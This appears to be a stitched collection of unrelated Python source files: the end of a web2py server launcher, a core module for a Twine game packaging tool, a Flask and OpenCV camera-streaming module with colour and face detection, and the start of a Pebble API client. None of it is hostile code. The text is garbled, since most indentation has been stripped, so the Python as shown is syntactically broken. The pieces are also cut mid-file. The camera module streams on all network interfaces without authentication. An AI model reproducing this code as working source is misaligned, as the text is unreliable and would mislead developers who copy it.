options.interfaces.append(tuple(interface))
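    # Worked example (a sketch of the parse above): an assumed input of
    # "127.0.0.1:8000;[::1]:8443" becomes
    # [('127.0.0.1', 8000), ('::1', 8443)]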
    # accept --scheduler in the form
    # "app1:group1:group2,app2:group1"
    # (apps separated by commas, groups per app separated by colons)
scheduler = []
options.scheduler_groups = None
if isinstance(options.scheduler, str):
if ':' in options.scheduler:
for opt in options.scheduler.split(','):
scheduler.append(opt.split(':'))
options.scheduler = ','.join([app[0] for app in scheduler])
options.scheduler_groups = scheduler
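    # Worked example (sketch): -K 'app1:group1:group2,app2:group1' yields
    # options.scheduler == 'app1,app2' and
    # options.scheduler_groups == [['app1', 'group1', 'group2'], ['app2', 'group1']]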
if options.numthreads is not None and options.minthreads is None:
options.minthreads = options.numthreads # legacy
create_welcome_w2p()
if not options.cronjob:
        # create the applications package if it is missing
if not os.path.exists('applications/__init__.py'):
write_file('applications/__init__.py', '')
return options, args
def check_existent_app(options, appname):
if os.path.isdir(os.path.join(options.folder, 'applications', appname)):
return True
def get_code_for_scheduler(app, options):
if len(app) == 1 or app[1] is None:
code = "from gluon.globals import current;current._scheduler.loop()"
else:
code = "from gluon.globals import current;current._scheduler.group_names = ['%s'];"
code += "current._scheduler.loop()"
code = code % ("','".join(app[1:]))
app_ = app[0]
if not check_existent_app(options, app_):
print("Application '%s' doesn't exist, skipping" % app_)
return None, None
return app_, code
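# Worked example (sketch): for an existing app,
# get_code_for_scheduler(['app1', 'group1'], options) returns ('app1',
# "from gluon.globals import current;current._scheduler.group_names = ['group1'];current._scheduler.loop()")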
def start_schedulers(options):
try:
from multiprocessing import Process
except:
        sys.stderr.write('Sorry, -K requires the multiprocessing module\n')
return
processes = []
apps = [(app.strip(), None) for app in options.scheduler.split(',')]
if options.scheduler_groups:
apps = options.scheduler_groups
code = "from gluon.globals import current;current._scheduler.loop()"
logging.getLogger().setLevel(options.debuglevel)
if options.folder:
os.chdir(options.folder)
if len(apps) == 1 and not options.with_scheduler:
app_, code = get_code_for_scheduler(apps[0], options)
if not app_:
return
print('starting single-scheduler for "%s"...' % app_)
run(app_, True, True, None, False, code)
return
# Work around OS X problem: http://bugs.python.org/issue9405
import urllib
urllib.getproxies()
for app in apps:
app_, code = get_code_for_scheduler(app, options)
if not app_:
continue
print('starting scheduler for "%s"...' % app_)
args = (app_, True, True, None, False, code)
p = Process(target=run, args=args)
processes.append(p)
print("Currently running %s scheduler processes" % (len(processes)))
p.start()
##to avoid bashing the db at the same time
time.sleep(0.7)
print("Processes started")
for p in processes:
try:
p.join()
except (KeyboardInterrupt, SystemExit):
print("Processes stopped")
except:
p.terminate()
p.join()
def start(cron=True):
""" Starts server """
# ## get command line arguments
(options, args) = console()
if not options.nobanner:
print(ProgramName)
print(ProgramAuthor)
print(ProgramVersion)
from pydal.drivers import DRIVERS
if not options.nobanner:
print('Database drivers available: %s' % ', '.join(DRIVERS))
# ## if -L load options from options.config file
if options.config:
try:
options2 = __import__(options.config, {}, {}, '')
except Exception:
try:
# Jython doesn't like the extra stuff
options2 = __import__(options.config)
except Exception:
print('Cannot import config file [%s]' % options.config)
sys.exit(1)
for key in dir(options2):
if hasattr(options, key):
setattr(options, key, getattr(options2, key))
# ## if -T run doctests (no cron)
if hasattr(options, 'test') and options.test:
test(options.test, verbose=options.verbose)
return
# ## if -S start interactive shell (also no cron)
if options.shell:
if options.folder:
os.chdir(options.folder)
if not options.args is None:
sys.argv[:] = options.args
run(options.shell, plain=options.plain, bpython=options.bpython,
import_models=options.import_models, startfile=options.run,
cronjob=options.cronjob)
return
# ## if -C start cron run (extcron) and exit
# ## -K specifies optional apps list (overloading scheduler)
if options.extcron:
logger.debug('Starting extcron...')
global_settings.web2py_crontype = 'external'
if options.scheduler: # -K
apps = [app.strip() for app in options.scheduler.split(
',') if check_existent_app(options, app.strip())]
else:
apps = None
extcron = newcron.extcron(options.folder, apps=apps)
extcron.start()
extcron.join()
return
# ## if -K
if options.scheduler and not options.with_scheduler:
try:
start_schedulers(options)
except KeyboardInterrupt:
pass
return
# ## if -H cron is enabled in this *process*
# ## if --softcron use softcron
# ## use hardcron in all other cases
if cron and options.runcron and options.softcron:
print('Using softcron (but this is not very efficient)')
global_settings.web2py_crontype = 'soft'
elif cron and options.runcron:
logger.debug('Starting hardcron...')
global_settings.web2py_crontype = 'hard'
newcron.hardcron(options.folder).start()
# ## if no password provided and havetk start Tk interface
# ## or start interface if we want to put in taskbar (system tray)
try:
options.taskbar
except:
options.taskbar = False
if options.taskbar and os.name != 'nt':
print('Error: taskbar not supported on this platform')
sys.exit(1)
root = None
if not options.nogui and options.password == '<ask>':
try:
import Tkinter
havetk = True
try:
root = Tkinter.Tk()
except:
pass
except (ImportError, OSError):
logger.warn(
'GUI not available because Tk library is not installed')
havetk = False
options.nogui = True
if root:
root.focus_force()
# Mac OS X - make the GUI window rise to the top
if os.path.exists("/usr/bin/osascript"):
applescript = """
tell application "System Events"
set proc to first process whose unix id is %d
set frontmost of proc to true
end tell
""" % (os.getpid())
os.system("/usr/bin/osascript -e '%s'" % applescript)
master = web2pyDialog(root, options)
signal.signal(signal.SIGTERM, lambda a, b: master.quit())
try:
root.mainloop()
except:
master.quit()
sys.exit()
# ## if no tk and no password, ask for a password
if not root and options.password == '<ask>':
options.password = getpass.getpass('choose a password:')
if not options.password and not options.nobanner:
print('no password, no admin interface')
    # ## -X (if no tk, the widget takes care of it itself)
if not root and options.scheduler and options.with_scheduler:
t = threading.Thread(target=start_schedulers, args=(options,))
t.start()
# ## start server
# Use first interface IP and port if interfaces specified, since the
# interfaces option overrides the IP (and related) options.
if not options.interfaces:
(ip, port) = (options.ip, int(options.port))
else:
first_if = options.interfaces[0]
(ip, port) = first_if[0], first_if[1]
# Check for non default value for ssl inputs
if (len(options.ssl_certificate) > 0) or (len(options.ssl_private_key) > 0):
proto = 'https'
else:
proto = 'http'
url = get_url(ip, proto=proto, port=port)
if not options.nobanner:
message = '\nplease visit:\n\t%s\n' % url
if sys.platform.startswith('win'):
message += 'use "taskkill /f /pid %i" to shutdown the web2py server\n\n' % os.getpid()
else:
message += 'use "kill -SIGTERM %i" to shutdown the web2py server\n\n' % os.getpid()
print(message)
# enhance linecache.getline (used by debugger) to look at the source file
# if the line was not found (under py2exe & when file was modified)
import linecache
py2exe_getline = linecache.getline
def getline(filename, lineno, *args, **kwargs):
line = py2exe_getline(filename, lineno, *args, **kwargs)
if not line:
try:
f = open(filename, "r")
try:
for i, line in enumerate(f):
if lineno == i + 1:
break
else:
line = None
finally:
f.close()
except (IOError, OSError):
line = None
return line
linecache.getline = getline
server = main.HttpServer(ip=ip,
port=port,
password=options.password,
pid_filename=options.pid_filename,
log_filename=options.log_filename,
profiler_dir=options.profiler_dir,
ssl_certificate=options.ssl_certificate,
ssl_private_key=options.ssl_private_key,
ssl_ca_certificate=options.ssl_ca_certificate,
min_threads=options.minthreads,
max_threads=options.maxthreads,
server_name=options.server_name,
request_queue_size=options.request_queue_size,
timeout=options.timeout,
socket_timeout=options.socket_timeout,
shutdown_timeout=options.shutdown_timeout,
path=options.folder,
interfaces=options.interfaces)
try:
server.start()
except KeyboardInterrupt:
server.stop()
try:
t.join()
except:
pass
logging.shutdown()
|
core.py
|
import json
import logging
import multiprocessing
multiprocessing.freeze_support()
from pathlib import Path
from settings_manager import SettingsManager
import subprocess
import platform
import sys
import threading
from datetime import datetime
from queue import Queue
from threading import Thread
from constants import *
import zipimport
##
# Sorry for anyone who looks at this.
# I need to get around to refactoring
# and this is nowhere near as bad as builder.py...
# lb
##
class QueueHandler(logging.Handler):
def __init__(self, log_queue):
super().__init__()
self.log_queue = log_queue
def emit(self, record):
self.log_queue.put(record)
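# Usage sketch (names assumed): hand log records from worker threads to a GUI
# poll loop, so no widget is touched from the logging thread.
#   q = Queue()
#   logging.getLogger('TweGeT').addHandler(QueueHandler(q))
#   record = q.get()            # e.g. inside the GUI's polling callback
#   text = record.getMessage()  # then append `text` to a read-only widget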
def resource_path(relative_path):
try:
base_path = Path(sys._MEIPASS)
except Exception:
base_path = Path(".")
return base_path.joinpath(Path(relative_path))
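# Example (sketch): resource_path('templates/index.js') resolves against
# sys._MEIPASS when running from a PyInstaller bundle, and against the
# current directory when running from source. 'templates/index.js' is an
# assumed relative path used only for illustration.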
class Core:
log_queue = None
logger = None
queue_handler = None
settings_manager = None
icon_type = ("Icon files", "*.ico")
ON_POSIX = 'posix' in sys.builtin_module_names
LIB_DICT_NAME = "libs"
PROJECT_DICT_NAME = "project"
AUTHOR_DICT_NAME = "author"
UPDATED_TIME_KEY = "last_updated_at"
BUILD_DIR_KEY = "build_directory"
libs = {
NPM_LOCATION: "",
NPX_LOCATION: "",
TWEEGO_LOCATION: ""
}
project = {
PROJ_NAME: "",
PROJ_DIR: "",
PROJ_HTML: "",
PROJ_PARENT_DIR: "",
PROJ_BUILD_DIR: "",
PROJ_VERSION: "1.0.0",
PROJ_DIMS_HEIGHT: "600",
PROJ_DIMS_WIDTH: "800",
PROJ_ICON_LOCATION: "",
PROJ_KEYWORDS: "",
PROJ_LAST_UPDATED: ""
}
author = {
AUTHOR_NAME: "Your Name",
AUTHOR_EMAIL: "",
AUTHOR_REPO: "",
}
# I cannot find a nicer way of doing this without installing additional packages
processes = []
entry_size = (20, 1)
system_type = platform.system()
# System dependent variables
which_command = "which"
shell = False
lock = threading.Lock()
cmd_extension = ""
WINDOWS_CMD_EXT = ".cmd"
def __init__(self):
# Set up all the logging
self.logger = logging.getLogger('TweGeT')
logging.basicConfig(level=logging.DEBUG,
format=u'%(asctime)s - %(levelname)s - %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
handler = logging.StreamHandler(sys.stderr)
handler.setLevel(logging.CRITICAL)
formatter = logging.Formatter(u'%(asctime)s - %(levelname)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
fhandler = logging.FileHandler("twet.log", 'w', 'utf-8')
fhandler.setFormatter(formatter)
handler.setFormatter(formatter)
self.logger.addHandler(handler)
self.logger.addHandler(fhandler)
self.log_queue = Queue()
self.queue_handler = QueueHandler(self.log_queue)
self.logger.addHandler(self.queue_handler)
self.settings_manager = SettingsManager()
if self.system_type == WINDOWS:
self.which_command = "where"
self.shell = True
self.cmd_extension = self.WINDOWS_CMD_EXT
if self.system_type == DARWIN:
self.icon_type = ("Iconset", "*.icns")
def enqueue_output(self, out, queue):
for line in iter(out.readline, b''):
string = str(line, encoding="utf-8")
try:
self.logger.info(string)
except:
string = line
self.logger.info(string)
out.close()
self.lock.release()
def get_bin_path(self, app_name):
        try:
            proc = self.test_existence(app_name)
            # We have a result; grab the first line of output.
            # Windows note: the first location returned /tends/ to be the binary itself.
            location = proc.split("\n")[0].strip()
            return location
        except AssertionError:
            return None
def run_command_with_output(self, commands, cwd=None):
process = subprocess.Popen(commands, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE,
shell=False,
bufsize=0, text=None, cwd=cwd)
self.processes.append(process)
t = Thread(target=self.enqueue_output, args=(process.stdout, self.log_queue))
self.lock.acquire(blocking=False)
t.start()
# Warning: Blocking
def run_command_store_output(self, commands, cwd=None):
process = subprocess.Popen(commands, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=False,
bufsize=0, text=None, cwd=cwd)
output = ""
for line in iter(process.stdout.readline, b''):
output += str(line, encoding="utf-8")
process.stdout.close()
return output
def find_dependencies(self):
        # Fall back to the saved setting when the binary cannot be located on PATH.
        res = self.get_bin_path(NPM) or self.settings_manager.find_setting(NPM)
        if not res:
self.logger.info(
"NPM cannot be found. It is likely not installed. Please visit https://www.npmjs.com/get-npm to install")
self.libs[NPM_LOCATION] = res
        res = self.get_bin_path(NPX) or self.settings_manager.find_setting(NPX)
        if not res:
self.logger.info(
"NPX cannot be found. It is likely not installed. Please visit https://www.npmjs.com/get-npm to install")
self.libs[NPX_LOCATION] = res
        res = self.get_bin_path(TWEEGO) or self.settings_manager.find_setting(TWEEGO)
        if not res:
self.logger.info(
"Tweego cannot be found. Either locate its executable or install from https://www.motoslave.net/tweego/")
self.libs[TWEEGO_LOCATION] = res
# TODO Still need to test for StoryFormats
def test_existence(self, app_name):
the_process = subprocess.run([self.which_command, app_name], universal_newlines=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE,
shell=self.shell)
assert (the_process.stderr == '')
return the_process.stdout
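    # Example (sketch): on Linux, self.test_existence('npm') runs `which npm`
    # and returns something like '/usr/bin/npm\n'; on Windows it runs
    # `where npm` and may return several lines, hence the first-line split
    # in get_bin_path().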
def create_lock_file(self, path):
publish_time_stamp = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
build_dir = str(path)
# Build the data before writing it to file
data = {self.UPDATED_TIME_KEY: publish_time_stamp, self.BUILD_DIR_KEY: build_dir,
self.AUTHOR_DICT_NAME: self.author, self.LIB_DICT_NAME: self.libs, self.PROJECT_DICT_NAME: self.project}
with open(path.joinpath(DETAILS_FILE_NAME), 'w', encoding="utf-8") as f:
json.dump(data, fp=f, ensure_ascii=False, indent=4, sort_keys=True)
def load_lock_file(self, path):
        # restores the saved libs/project/author dictionaries onto this instance
        # This method ensures that dictionary structure won't be affected
with open(path, 'r', encoding="utf-8") as f:
data = json.load(f)
self.libs = data[self.LIB_DICT_NAME]
self.project = data[self.PROJECT_DICT_NAME]
self.author = data[self.AUTHOR_DICT_NAME]
def update_package_json(self, path):
data = None
with open(path, 'r', encoding="utf-8") as f:
data = json.load(f)
# keywords = data["keywords"]
data["keywords"] = self.project[PROJ_KEYWORDS].split(",")
data["author"]["name"] = self.author[AUTHOR_NAME]
data["author"]["email"] = self.author[AUTHOR_EMAIL]
        data["repository"] = self.author[AUTHOR_REPO]
data["version"] = self.project[PROJ_VERSION]
data["config"]["forge"]["packagerConfig"] = {"icon": "icon"}
with open(path, 'w', encoding="utf-8") as f:
json.dump(data, fp=f, indent=4)
def terminate_processes(self):
# this == ugly but it'll work until I improve it
self.logger.info("Ending other tasks")
for p in self.processes:
if p.returncode is None:
p.terminate()
self.logger.info("All tasks finished, can safely close now.")
def replace_js_parameters(self, path):
js = None
with open(resource_path(INDEX_JS_TEMPLATE_PATH), 'r') as f:
js = f.read()
js = js.replace(JS_HEIGHT_KEY, self.project[PROJ_DIMS_HEIGHT]).replace(JS_WIDTH_KEY,
self.project[PROJ_DIMS_WIDTH])
with open(path, 'w') as f:
f.write(js)
def write_settings(self):
self.settings_manager.write_out_settings(self.libs)
def read_settings(self):
m, x, t = self.settings_manager.read_in_settings()
if m is None and x is None and t is None:
return
if self.libs[NPM_LOCATION] == "":
self.libs[NPM_LOCATION] = m
if self.libs[NPX_LOCATION] == "":
self.libs[NPX_LOCATION] = x
if self.libs[TWEEGO_LOCATION] == "":
self.libs[TWEEGO_LOCATION] = t
|
vilib.py
|
import numpy as np
import cv2
import threading
from importlib import import_module
import os
from flask import Flask, render_template, Response
from multiprocessing import Process, Manager
import time
from utils import cpu_temperature
# from rgb_matrix import RGB_Matrix
app = Flask(__name__)
@app.route('/')
def index():
"""Video streaming home page."""
return render_template('index.html')
def gen():
"""Video streaming generator function."""
while True:
frame = cv2.imencode('.jpg', Vilib.img_array[0])[1].tobytes()
yield (b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n')
@app.route('/mjpg')
def video_feed():
# from camera import Camera
"""Video streaming route. Put this in the src attribute of an img tag."""
return Response(gen(),
mimetype='multipart/x-mixed-replace; boundary=frame')
def web_camera_start():
    app.run(host='0.0.0.0', port=9000, threaded=True)
class Vilib(object):
face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
    kernel_5 = np.ones((5, 5), np.uint8)  # 5x5 kernel for morphological operations
# color_default = 'blue'
# color_dict = {'red':[0,4],'orange':[5,18],'yellow':[22,37],'green':[42,85],'blue':[92,110],'purple':[115,165],'red_2':[166,180]}
# lower_color = np.array([min(color_dict[detect_obj_parameter['color_default']]), 60, 60])
# upper_color = np.array([max(color_dict[detect_obj_parameter['color_default']]), 255, 255])
# hdf_flag = False
# cdf_flag = False
# stf_flag = False
video_source = 0
# human_object_counter = 0
# detect_obj_parameter = np.array([0,0])
# human_object_size = np.array([0,0])
# color_object_counter = 0
detect_obj_parameter = Manager().dict()
img_array = Manager().list(range(2))
#Color_obj_parameter
detect_obj_parameter['color_default'] = 'red'
color_dict = {'red':[0,4],'orange':[5,18],'yellow':[22,37],'green':[42,85],'blue':[92,110],'purple':[115,165],'red_2':[166,180]}
detect_obj_parameter['color_x'] = 160
detect_obj_parameter['color_y'] = 120
detect_obj_parameter['color_w'] = 0
detect_obj_parameter['color_h'] = 0
detect_obj_parameter['color_n'] = 0
detect_obj_parameter['lower_color'] = np.array([min(color_dict[detect_obj_parameter['color_default']]), 60, 60])
detect_obj_parameter['upper_color'] = np.array([max(color_dict[detect_obj_parameter['color_default']]), 255, 255])
#Human_obj_parameter
detect_obj_parameter['human_x'] = 160
detect_obj_parameter['human_y'] = 120
detect_obj_parameter['human_w'] = 0
detect_obj_parameter['human_h'] = 0
detect_obj_parameter['human_n'] = 0
#detect_switch
detect_obj_parameter['hdf_flag'] = False
detect_obj_parameter['cdf_flag'] = False
rt_img = np.ones((320,240),np.uint8)
front_view_img = np.zeros((240,320,3), np.uint8)
    # fill the image area with white (the default is black)
# front_view_img.fill(255)
img_array[0] = rt_img
# img_array = rt_img
vi_img = np.ones((320,240),np.uint8)
@staticmethod
def color_detect_object(obj_parameter):
if obj_parameter == 'x':
# print(Vilib.detect_obj_parameter['x'])
return int(Vilib.detect_obj_parameter['color_x']/107.0)-1
elif obj_parameter == 'y':
# print(Vilib.detect_obj_parameter['y'])
return -1*(int(Vilib.detect_obj_parameter['color_y']/80.1)-1) #max_size_object_coordinate_y
elif obj_parameter == 'width':
return Vilib.detect_obj_parameter['color_w'] #objects_max_width
elif obj_parameter == 'height':
return Vilib.detect_obj_parameter['color_h'] #objects_max_height
elif obj_parameter == 'number':
return Vilib.detect_obj_parameter['color_n'] #objects_count
return None
@staticmethod
def human_detect_object(obj_parameter):
if obj_parameter == 'x':
# print(Vilib.detect_obj_parameter['x'])
return int(Vilib.detect_obj_parameter['human_x']/107.0)-1
elif obj_parameter == 'y':
# print(Vilib.detect_obj_parameter['y'])
return -1*(int(Vilib.detect_obj_parameter['human_y']/80.1)-1) #max_size_object_coordinate_y
elif obj_parameter == 'width':
return Vilib.detect_obj_parameter['human_w'] #objects_max_width
elif obj_parameter == 'height':
return Vilib.detect_obj_parameter['human_h'] #objects_max_height
elif obj_parameter == 'number':
return Vilib.detect_obj_parameter['human_n'] #objects_count
return None
@staticmethod
def detect_color_name(color_name):
Vilib.detect_obj_parameter['color_default'] = color_name
Vilib.detect_obj_parameter['lower_color'] = np.array([min(Vilib.color_dict[Vilib.detect_obj_parameter['color_default']]), 60, 60])
Vilib.detect_obj_parameter['upper_color'] = np.array([max(Vilib.color_dict[Vilib.detect_obj_parameter['color_default']]), 255, 255])
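    # Example: Vilib.detect_color_name('blue') narrows the HSV mask to
    # lower [92, 60, 60] / upper [110, 255, 255], per color_dict above.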
@staticmethod
def camera_start(web_func = True):
from multiprocessing import Process
# Vilib.conn1, Vilib.conn2 = Pipe()
# Vilib.q = Queue()
worker_2 = Process(name='worker 2',target=Vilib.camera_clone)
if web_func == True:
worker_1 = Process(name='worker 1',target=web_camera_start)
worker_1.start()
worker_2.start()
        # if web_func == True:
        #     # from flask_camera import web_camera_start
        #     t2 = threading.Thread(target=web_camera_start)  # create a thread object for the web stream
        #     t2.start()  # run the thread
        # t1 = threading.Thread(target=Vilib.camera_clone)  # create a thread object for the camera loop
        # t1.start()  # run the thread
@staticmethod
def human_detect_switch(flag=False):
Vilib.detect_obj_parameter['hdf_flag'] = flag
@staticmethod
def color_detect_switch(flag=False):
Vilib.detect_obj_parameter['cdf_flag'] = flag
@staticmethod
def camera_clone():
Vilib.camera()
@staticmethod
def camera():
# from PIL import Image
# rm = RGB_Matrix(0X74) #RGB
# k_img = []
camera = cv2.VideoCapture(Vilib.video_source)
camera.set(3,320)
camera.set(4,240)
width = int(camera.get(3))
height = int(camera.get(4))
M = cv2.getRotationMatrix2D((width / 2, height / 2), 180, 1)
camera.set(cv2.CAP_PROP_BUFFERSIZE,1)
cv2.setUseOptimized(True)
# pj_img = cv2.imread("javars.png")
# pj_img = cv2.resize(pj_img, (320, 240), interpolation=cv2.INTER_LINEAR)
# print(Vilib.front_view_img.shape)
front_view_coor_1 = ()
front_view_coor_2 = ()
while True:
_, img = camera.read()
# img = cv2.warpAffine(img, M, (320, 240))
Vilib.front_view_img =img.copy()
# img = cv2.resize(img, (8,8), interpolation=cv2.INTER_LINEAR)
img = Vilib.human_detect_func(img)
img = Vilib.color_detect_func(img)
# print(Vilib.color_detect_func(img).shape)
front_view_coor_1 = (Vilib.detect_obj_parameter['color_x'], Vilib.detect_obj_parameter['color_y'])
front_view_coor_2 = (Vilib.detect_obj_parameter['color_x']+40, Vilib.detect_obj_parameter['color_y']+40)
cv2.rectangle(Vilib.front_view_img, front_view_coor_1, front_view_coor_2, (255, 144, 30), -1)
cv2.rectangle(Vilib.front_view_img, (0,0), (320,20), (46,139,87), -1)
cv2.putText(Vilib.front_view_img,"temp: "+str(cpu_temperature()),(0, 15), cv2.FONT_HERSHEY_SIMPLEX, 0.5,(0,0,255),1,cv2.LINE_AA)
cv2.putText(Vilib.front_view_img,'hello world!',(160,160), cv2.FONT_HERSHEY_SIMPLEX, 1.5,(255,255,255),2, cv2.LINE_AA)
# cv2.line(Vilib.front_view_img, (Vilib.detect_obj_parameter['color_x'], Vilib.detect_obj_parameter['color_y']), (120, 200), (255, 144, 30), 5)
Vilib.img_array[0] = cv2.addWeighted(img, 0.5, Vilib.front_view_img, 0.5, 0)
# cv2.rectangle(Vilib.front_view_img, (0, 0), (320, 240), (255, 144, 30), 40)
            # k_img = list(Image.fromarray(cv2.cvtColor(Vilib.img_array[0],cv2.COLOR_BGR2RGB)).getdata())  # convert OpenCV image to PIL
# rm.image(k_img)
# Vilib.img_array[0] = cv2.addWeighted(Vilib.color_detect_func(img), 0.9, pj_img, 0.1, 0)
# if w == True:
# q.send(Vilib.vi_img)
@staticmethod
def human_detect_func(img):
if Vilib.detect_obj_parameter['hdf_flag'] == True:
            resize_img = cv2.resize(img, (160, 120), interpolation=cv2.INTER_LINEAR)  # downscale for faster detection
            gray = cv2.cvtColor(resize_img, cv2.COLOR_BGR2GRAY)  # convert from BGR to grayscale
faces = Vilib.face_cascade.detectMultiScale(gray, 1.3, 2)
# print(len(faces))
Vilib.detect_obj_parameter['human_n'] = len(faces)
max_area = 0
if Vilib.detect_obj_parameter['human_n'] > 0:
for (x,y,w,h) in faces:
x = x*2
y = y*2
w = w*2
h = h*2
cv2.rectangle(img,(x,y),(x+w,y+h),(255,0,0),2)
                    object_area = w*h
                    if object_area > max_area:
                        # keep the largest detected face and report its centre
                        max_area = object_area
                        Vilib.detect_obj_parameter['human_x'] = int(x + w/2)
                        Vilib.detect_obj_parameter['human_y'] = int(y + h/2)
                        Vilib.detect_obj_parameter['human_w'] = w
                        Vilib.detect_obj_parameter['human_h'] = h
else:
Vilib.detect_obj_parameter['human_x'] = 160
Vilib.detect_obj_parameter['human_y'] = 120
Vilib.detect_obj_parameter['human_w'] = 0
Vilib.detect_obj_parameter['human_h'] = 0
Vilib.detect_obj_parameter['human_n'] = 0
return img
else:
return img
@staticmethod
def color_detect_func(img):
        # Colour ranges shift with lighting, so tune them as needed. H: hue, S: saturation, V: value
if Vilib.detect_obj_parameter['cdf_flag'] == True:
resize_img = cv2.resize(img, (160,120), interpolation=cv2.INTER_LINEAR)
            hsv = cv2.cvtColor(resize_img, cv2.COLOR_BGR2HSV)  # convert from BGR to HSV
# print(Vilib.lower_color)
            mask = cv2.inRange(hsv, Vilib.detect_obj_parameter['lower_color'], Vilib.detect_obj_parameter['upper_color'])  # pixels between lower/upper become white, the rest black
if Vilib.detect_obj_parameter['color_default'] == 'red':
mask_2 = cv2.inRange(hsv, (175,50,20), (180,255,255))
mask = cv2.bitwise_or(mask, mask_2)
            open_img = cv2.morphologyEx(mask, cv2.MORPH_OPEN, Vilib.kernel_5, iterations=1)  # morphological opening to remove speckle noise
            contours, hierarchy = cv2.findContours(open_img, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)  # find the external contours in the binary mask
# p=0
Vilib.detect_obj_parameter['color_n'] = len(contours)
max_area = 0
if Vilib.detect_obj_parameter['color_n'] > 0:
                for i in contours:  # iterate over every detected contour
                    x,y,w,h = cv2.boundingRect(i)  # bounding box: top-left corner plus width and height
                    # draw a rectangle on the image (image, top-left, bottom-right, colour, line width)
if w > 8 and h > 8:
x = x*2
y = y*2
w = w*2
h = h*2
cv2.rectangle(img,(x,y),(x+w,y+h),(0,255,0),2)
                        # label the detected object with its colour name (offset the text to adjust its position)
                        cv2.putText(img,Vilib.detect_obj_parameter['color_default'],(x,y), cv2.FONT_HERSHEY_SIMPLEX, 1,(0,0,255),2)
                        object_area = w*h
                        if object_area > max_area:
                            # keep the largest matching blob and report its centre
                            max_area = object_area
                            Vilib.detect_obj_parameter['color_x'] = int(x + w/2)
                            Vilib.detect_obj_parameter['color_y'] = int(y + h/2)
                            Vilib.detect_obj_parameter['color_w'] = w
                            Vilib.detect_obj_parameter['color_h'] = h
else:
Vilib.detect_obj_parameter['color_x'] = 160
Vilib.detect_obj_parameter['color_y'] = 120
Vilib.detect_obj_parameter['color_w'] = 0
Vilib.detect_obj_parameter['color_h'] = 0
Vilib.detect_obj_parameter['color_n'] = 0
return img
else:
return img
|
pebble.py
|
# Copyright 2021 Canonical Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Client for the Pebble API (HTTP over Unix socket).
For a command-line interface for local testing, see test/pebble_cli.py.
"""
import binascii
import cgi
import datetime
import email.parser
import enum
import http.client
import io
import json
import logging
import os
import re
import select
import shutil
import signal
import socket
import sys
import threading
import time
import types
import typing
import urllib.error
import urllib.parse
import urllib.request
import warnings
from ops._private import yaml
from ops._vendor import websocket
logger = logging.getLogger(__name__)
_not_provided = object()
class _UnixSocketConnection(http.client.HTTPConnection):
"""Implementation of HTTPConnection that connects to a named Unix socket."""
def __init__(self, host, timeout=_not_provided, socket_path=None):
if timeout is _not_provided:
super().__init__(host)
else:
super().__init__(host, timeout=timeout)
self.socket_path = socket_path
def connect(self):
"""Override connect to use Unix socket (instead of TCP socket)."""
if not hasattr(socket, 'AF_UNIX'):
raise NotImplementedError('Unix sockets not supported on {}'.format(sys.platform))
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.sock.connect(self.socket_path)
if self.timeout is not _not_provided:
self.sock.settimeout(self.timeout)
class _UnixSocketHandler(urllib.request.AbstractHTTPHandler):
"""Implementation of HTTPHandler that uses a named Unix socket."""
def __init__(self, socket_path):
super().__init__()
self.socket_path = socket_path
def http_open(self, req):
"""Override http_open to use a Unix socket connection (instead of TCP)."""
return self.do_open(_UnixSocketConnection, req, socket_path=self.socket_path)
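# Usage sketch (socket path assumed): route a urllib request over the socket.
#   opener = urllib.request.build_opener(_UnixSocketHandler('/path/to/.pebble.socket'))
#   resp = opener.open('http://localhost/v1/system-info', timeout=5.0)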
# Matches yyyy-mm-ddTHH:MM:SS(.sss)ZZZ
_TIMESTAMP_RE = re.compile(
r'(\d{4})-(\d{2})-(\d{2})[Tt](\d{2}):(\d{2}):(\d{2})(\.\d+)?(.*)')
# Matches [-+]HH:MM
_TIMEOFFSET_RE = re.compile(r'([-+])(\d{2}):(\d{2})')
def _parse_timestamp(s):
"""Parse timestamp from Go-encoded JSON.
This parses RFC3339 timestamps (which are a subset of ISO8601 timestamps)
that Go's encoding/json package produces for time.Time values.
Unfortunately we can't use datetime.fromisoformat(), as that does not
support more than 6 digits for the fractional second, nor the 'Z' for UTC.
Also, it was only introduced in Python 3.7.
"""
match = _TIMESTAMP_RE.match(s)
if not match:
raise ValueError('invalid timestamp {!r}'.format(s))
y, m, d, hh, mm, ss, sfrac, zone = match.groups()
if zone in ('Z', 'z'):
tz = datetime.timezone.utc
else:
match = _TIMEOFFSET_RE.match(zone)
if not match:
raise ValueError('invalid timestamp {!r}'.format(s))
sign, zh, zm = match.groups()
tz_delta = datetime.timedelta(hours=int(zh), minutes=int(zm))
tz = datetime.timezone(tz_delta if sign == '+' else -tz_delta)
microsecond = round(float(sfrac or '0') * 1000000)
return datetime.datetime(int(y), int(m), int(d), int(hh), int(mm), int(ss),
microsecond=microsecond, tzinfo=tz)
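# Example: _parse_timestamp('2021-01-28T14:37:02.247202105+13:00') returns
# datetime.datetime(2021, 1, 28, 14, 37, 2, 247202,
#                   tzinfo=datetime.timezone(datetime.timedelta(hours=13))),
# rounding the 9-digit fraction to microseconds.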
def _format_timeout(timeout: float):
"""Format timeout for use in the Pebble API.
The format is in seconds with a millisecond resolution and an 's' suffix,
as accepted by the Pebble API (which uses Go's time.ParseDuration).
"""
return '{:.3f}s'.format(timeout)
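# Example: _format_timeout(4.0) == '4.000s' and _format_timeout(0.25) == '0.250s'.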
def _json_loads(s: typing.Union[str, bytes]) -> typing.Dict:
"""Like json.loads(), but handle str or bytes.
This is needed because an HTTP response's read() method returns bytes on
Python 3.5, and json.load doesn't handle bytes.
"""
if isinstance(s, bytes):
s = s.decode('utf-8')
return json.loads(s)
